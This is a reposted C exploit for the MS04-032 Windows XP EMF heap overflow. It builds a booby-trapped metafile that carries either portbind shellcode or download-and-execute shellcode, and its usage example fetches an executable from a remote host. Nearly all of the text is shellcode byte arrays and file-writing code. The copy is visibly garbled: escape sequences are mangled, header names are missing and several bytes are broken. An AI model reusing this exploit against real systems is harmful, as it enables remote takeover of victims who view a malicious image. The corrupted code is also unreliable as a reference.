[EXPL] (MS04-032) Microsoft Windows XP Metafile (.emf) HEAP

--- SNIP ---

/ * HOD-MS04032-EMF-EXPL2.C:

*

* (Ms04-032) Microsoft Windows XP Metafile (.emf) HEAP

Overflow

*

* EXPLOIT VERSION 0.2 (public) Coded by

*

*

*. :: [HouseOfDabus] ::.

*

*

* [AT Inbox Dot Ru]

* ------------------------------------------------- ------------------

* ABOUT WMF / EMF:

* Windows Metafile (WMF) and enhanced Windows

Metafile (EMF) Formats

* Are Vector Files That Can Contain A Raster Image ...

*

* ------------------------------------------------- ------------------

* The Vulnerability Will Be Triggered by Either Viewing A

Malicious

* file or by navigating to a Directory, Which Contains a

Malicious

* File and displays it as a thumbnail.

*

* GRAPHICS RENDERING ENGINE Vulnerability -

CAN-2004-0209

* ------------------------------------------------- ------------------

* TESTED ON:

* - Internet Explorer 6.0 (sp1) (ip1) (ip1) (IExplore.exe)

* - EXPLORER (Explorer.exe)

* - Windows XP SP1

*

* ------------------------------------------------- ------------------

* Compile:

* Win32 / VC : CL HOD-MS04032-EMF-EXPL.C

* WIN32 / CYGWIN: GCC HOD-MS04032-EMF-EXPL.C

-LWS2_32.lib

* Linux: GCC -O HOD-MS04032-EMF-EXPL

HOD-MS04032-EMF-EXPL.C

*

* ------------------------------------------------- ------------------

* Command Line Parameters / Arguments:

*

* HOD.EXE

[ConnectBack IP]

*

* Shellcode:

* 1 - Portbind shellcode

* 2 - Connectback shellcode

*

* ------------------------------------------------- ------------------

* EXAMPLES:

*

* C: /> HOD-MS04032-EMF-EXPL.EXE EXPL.EMF 1 7777

*

* C: /> HOD-MS04032-EMF-EXPL.EXE EXPL.EMF 2

http://host/file.exe

*

* ------------------------------------------------- ------------------ *

* This Is Provided as Proof-of-Concept Code Only for

educational

* Purposes and Testing by Authorized Individuals with

Permission to

* Do so.

*

* /

/ * #define _win32 * /

#include

#include

#include

#ifdef _win32

#pragma comment (Lib, "WS2_32")

#include

#ELSE

#include

#include

#include

#ENDIF

#include

Unsigned char emfheader [] =

"/ x01 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x20 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00"

"/ x4c / x03 / x00 / x00 / x00 / x20 / x45 / x4d / x46 / x00 / x00 / x01 / x00"

"/ x40 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / x00 / xff / xff / x00 / x00"

"/ XEB / X12 / X90 / X90 / X90 / X90 / X90 / X90"

"/ x9e / x5c / x05 / x78" / * call [EDI 0x74H] - rpcrt4.dll * /

"/ xb4 / x73 / xed / x77"; / * TOP SEH - XP SP1 * /

Unsigned char portbind_sc [] =

"/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ Xeb / X03 / X5D / XEB / X05 / XE8 / XF8 / XFF"

"/ XFF / XFF / X8B / XC5 / X83 / XC0 / X11 / X33 / XC9 / X01 / X80 / X30 / X88"

"/ x40 / x03 / x64 / x03 / x7c / x09 / x64 / x08 / x88 / x88 / x88 / x60 / xc4"

"/ X01 / XCE / X74 / X77 / XFE / X74 / XE0 / X06 / XC6 / X86 / X64 / X60 / XD9"

"/ x89 / x88 / x88 / x01 / xce / x4e / Xe0 / xbb / xba / x88 / x88 / Xe0 / XFF / XFB / XBA / XD7"

"/ XDC / X77 / XDE / X4E / X01 / XCE / X70 / X77 / XFE / X74 / XE0 / X25 / X51 / X8D / X46 / X60"

"/ XB8 / X01 / XCE / X5A / X77 / XFE / X74 / XE0 / XFA / X76 / X3B / X9E / X60"

"/ Xa8 / x89 / x 2008 / x88 / x01 / xce / x46 / x77 / xfe / x74 / x68 / x67 / x46 / x68 / XE8 / x60"

"/ x88 / x89 / xce / x42 / x77 / xfe / x70 / x74 / xb3 / x60" "/ x88 / x89 / x88 / x88 / x01 / xce / x7c / X77 / XFE / X70 / XE0 / X51 / X81 / X7D / X25 / X60 ""

"/ x78 / x88 / xce / x78 / x77 / xfE / x70 / x7 / x2c / x92 / xf8 / x4f / x60"

"/ X68 / X01 / XCE / X64 / X77 / XFE / X70 / XE0 / X2C / X25 / XA6 / X61 / X60"

"/ X58 / X01 / XCE / X60 / X77 / XFE / X70 / XE0 / X6D / XC1 / X0E / XC1 / X60"

"/ X48 / X01 / XCE / X6A / X77 / XFE / X70 / XE0 / X6F / XF1 / X4E / XF1 / X60"

"/ X38 / X01 / XCE / X5E / XBB / X77 / X09 / X64 / X7C / X89 / X88 / X88 / XDC"

"/ XE0 / X89 / X77 / XDE / X7C / XD8 / XD8 / XD8 / XD8 / XC8 / XD8 / XC8 / XD8"

"/ x77 / xde / x78 / x03 / x50 / xdf / xdf / x / x8a / x88 / xab / x6f / x03 / x44 / xe2 / x9e"

"/ xd9 / xdb / x77 / xde / x64 / xdf / xdb / x77 / xde / x60 / xbb / x77 / xdf / xd9 / xdb / x77"

"/ XDE / X6A / X03 / X58 / X01 / XCE / X36 / XE0 / XEB / XE5 / XEC / X88 / X01 / XEE / X4A / X0B"

"/ X4C / X24 / X05 / XB4 / XAC / XBB / X48 / XBB / X41 / X08 / X49 / X9D / X23 / X6A / X75 / X4E"

"/ XCC / XAC / X98 / XCC / X76 / XCC / XAC / XB5 / X01 / XDC / XAC / XC0 / X01 / XDC / XAC / XC4"

"/ X01 / XDC / XAC / XD8 / X05 / XCC / XAC / X98 / XDC / XD8 / XD9 / XD9 / XD9 / XC9 / XD9 / XC1"

"/ XD9 / XD9 / X77 / XFE / XDE / XD9 / X77 / XDE / X46 / X03 / X44 / XE2 / X77 / X77 / XB9 / X77"

"/ XDE / X5A / X03 / X40 / X77 / XFE / X36 / X77 / XDE / X5E / X63 / X16 / X77 / XDE / X9C / XDE"

"/ XEC / X29 / XB8 / X03 / XC8 / X84 / X03 / XF8 / X94 / X25 / X03 / XC8 / X80"

"/ XD6 / X4A / X8C / X88 / XDB / XDD / XDE / XDF / X03 / XE4 / XAC / X90 / X03 / XCD / XB4 / X03"

"/ xdc / x8d / xf0 / x8b / x5d / x03 / xc2 / x90 / x03 / xd2 / xa8 / x8b / x55 / x6b / xba / XC1"

"/ x03 / xbc / x03 / x8b / x7d / xbb / x77 / x74 / xbb / x48 / x24 / xb2 / x4c / xfc / x8f / x49"

"/ x47 / x85 / x8b / x70 / x63 / x7a / xb3 / xf4 / xac / x9c / xfd / x69 / x03 / xd2 / xac / x8b"

"/ X55 / XEE / X03 / X84 / XC3 / X03 / XD2 / X94 / X8B / X55 / X03 / X8C / X03 / X8B / X4D / X63"

"/ x8a / xbb / x48 / x03 / x5d / xd7 / xd6 / xd5 / xd3 / x4a / x8c / x88";

Unsigned char Download_sc [] = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90"

"/ XEB / X0F / X58 / X80 / X30 / X17 / X40 / X81 / X38 / X6D / X30 / X30 / X21 / X75 / XF4"

"/ XeB / X05 / XE8 / XEC / XFF / XFF / XFF / XFE / X94 / X16 / X17 / X17 / X4A / X42 / X26"

"/ XCC / X73 / X9C / X14 / X57 / XE8 / X57 / X62 / XEE / X9C / X44 / X14"

"/ X71 / X26 / XC5 / X71 / XAF / X17 / X07 / X71 / X96 / X2D / X5A / X4D / X63 / X10 / X3E"

"/ XD5 / XFE / XE5 / XE8 / XE8 / XE8 / X9E / XC4 / X9C / X6D / X2B / X16 / XC0 / X14 / X48"

"/ x6f / x9c / x5c / x0f / x9c / x64 / x37 / x9c / x6c / x33 / x16 / xc1 / x16 / xc0 / Xeb"

"/ xba / x16 / xc7 / x81 / x90 / xda / x46 / x26 / xde / x97 / xd6 / x18 / xe4 / xb1 / x65"

"/ X1D / X81 / X4E / X90 / XEA / X63 / X05 / X50 / X50 / XF5 / XF1 / XA9 / X18 / X17 / X17"

"/ x17 / x3e / xd9 / x3e / xe0 / xfe / xff / xe8 / xe8 / x-x26 / xd7 / x71 / x9c / x10"

"/ XD6 / XF7 / X15 / X9C / X64 / X0B / X16 / XC1 / X16 / XD1 / XBA / X16 / XC7 / X9E / XD1"

"/ x9e / xc0 / x4a / x9a / x92 / xb7 / x17 / x17 / x17 / x57 / x97 / x2f / x16 / x62 / xed"

"/ XD1 / X17 / X17 / X9A / X92 / X0B / X17 / X17 / X17 / X47 / X40 / XE8 / XC1 / X7F / X13"

"/ x17 / x17 / x07 / x17 / x17 / x7f / x68 / x81 / x8f / x17 / x7f / x17"

"/ x17 / x17 / x17 / x92 / x9a / x17 / x17 / x17 / x9a / x92 / x18 / x17"

"/ x17 / x17 / x 47 / x40 / x9a / x9a / x42 / x17 / x17 / x17 / x46 / xe8"

"/ XC7 / X9E / XD0 / X9A / X92 / X4A / X17 / X17 / X17 / X47 / X40 / XE8 / XC1 / X26 / XDE"

"/ X46 / X46 / XE8 / XC7 / X9E / XD4 / X9A / X92 / X7C / X17 / X17 / X17"

"/ x47 / x40 / xde / x46 / x46 / x46 / x46 / x9a / x82 / xb6 / x17 / x17"

"/ x17 / x45 / x44 / xd4 / x9a / x92 / x6b / x17 / x17 / x17 / x47 / x40"

"/ Xe8 / XC1 / X9A / X9A / X86 / X17 / X17 / X17 / X46 / X7F / X68 / X81 / X8F / X17 / XE8"

"/ xa2 / x17 / x44 / x17 / xc7 / x48 / x9a / x92 / x3e / x17 / x17 / x17"

"/ x47 / x40 / x17 / x17 / x17 / x17 / x9a / x8a / x82 / x17 / x17 / x17"

"/ X44 / XE8 / XC7 / X9E / XD4 / X9A / X92 / X26 / X17 / X17 / X17 / X47 / X40 / XE8 / XC1"

"/ XE8 / X17 / X17 / XE8 / XA2 / X9A / X17 / X17 / X17 / X44 / XE8 / XC7" "/ X9A / X92 / X2E / X17 / X17 / X17 / X47 / X40 / XE8 / XC1 / X44 / XE8 / XC7 / X9A / X92 "

"/ x56 / x17 / x40 / x17 / xc1 / x7f / x12 / x17 / x17 / x17 / x9a / x9a"

"/ x82 / x17 / x17 / xc7 / x9a / x92 / x5e / x17 / x17 / x17 / x47 / x40"

"/ XE8 / XC1 / X7F / X17 / X17 / X17 / X17 / XE8 / XC7 / XFF / X6F / XE9 / XE8 / XE8 / X50"

"/ x72 / x73 / x47 / x56 / x73 / x73 / x65 / x72 / x64 / x64 / x17 / x5b"

"/ x78 / x76 / x73 / x5b / x7e / x65 / x6 (x56 / x17 / x41 / x7e / x65"

"/ x63 / x56 / x7b / x7b / x78 / x74 / x17 / x48 / x7b / x74 / x65 / x72"

"/ x76 / x63 / x17 / x48 / x7b / x63 / x72 / x17 / x48 / x7b / x74 / x7b"

"/ x78 / x40 / x7e / x79 / x52 / x6f / x72 / x74 / x17 / x52 / x6f / x7e"

"/ x63 / x74 / x72 / x64 / x64 / x17 / x40 / x7e / x79 / x5e / x79 / x72"

"/ x63 / x17 / x72 / x65 / x79 / x72 / x63 / x58 / x67 / x72 / x79 / x56"

"/ x17 / x5e / x79 / x63 / x72 / x63 / x58 / x67 / x72 / x79 / x42 / x65"

"/ x7b / x56 / x17 / x72 / x65 / x79 / x72 / x63 / x45 / x72 / x76 / x73"

"/ x51 / x17 / x17 / x17 / x17 / x17 / x17 / x17 / x17 / x17 / x7a / x27"

"/ x27 / x39 / x72 / x6f / x72 / x17" "hod" "/ x21";

Unsigned char endoffile [] = "/ x00 / x00 / x00 / x00";

Void

USAGE (Char * PROG)

{

Printf ("USAGE: / N");

Printf ("% s / n", prog);

Printf ("/ nshellcode: / n");

Printf ("1 - portbind shellcode / n");

Printf ("2 - Download & Exec Shellcode / N / N");

exit (0);

}

int

Main (int Argc, char ** argv)

{

CHAR ENDOFURL = '/ X01';

UNSIGNED SHORT Port;

Int sc;

File * fp;

Printf ("/ N (ms04-032) Microsoft Windows XP Metafile

(.emf) Heap overflow / n / n ");

Printf ("--- code by. :: [HouseOfDabus] ::. --- / n / n"); if (Argc <4) USAGE (Argv [0]);

SC = ATOI (Argv [2]);

IF ((SC> 2) || (SC <1)) USAGE (Argv [0]);

FP = fopen (Argv [1], "WB");

IF (fp == NULL) {

Printf ("[-] error: CAN / 'T CREATE FILE:% S / N", Argv [1]);

exit (0);

}

/ * Header * /

FWRITE (EMFHEADER, 1, SIZEOF (EMFHEADER) -1, FP);

PRINTF ("[*] shellcode:");

IF (sc == 1) {

Port = ATOI (Argv [3]);

Printf ("Portbind, Port =% U / N", Port);

Port = HTONS (port ^ (unsigned short) 0x8888);

Memcpy (portbind_sc 266, & port, 2);

FWRITE (portbind_sc, 1, sizeof (portbind_sc) -1, fp);

FWRITE (Endoffile, 1, 4, FP);

}

Else {

Printf ("Download & Exec, URL =% S / N", Argv [3]);

FWRITE (Download_SC, 1, SIZEOF (Download_sc) -1,

FP);

FWRITE (Argv [3], 1, Strlen (Argv [3]), FP);

FWRITE (& EndOfurl, 1, 1, fp);

FWRITE (Endoffile, 1, 4, FP);

}

Printf ("[ ] OK / N");

Fclose (fp);

Return 0;

}

--- SNIP ---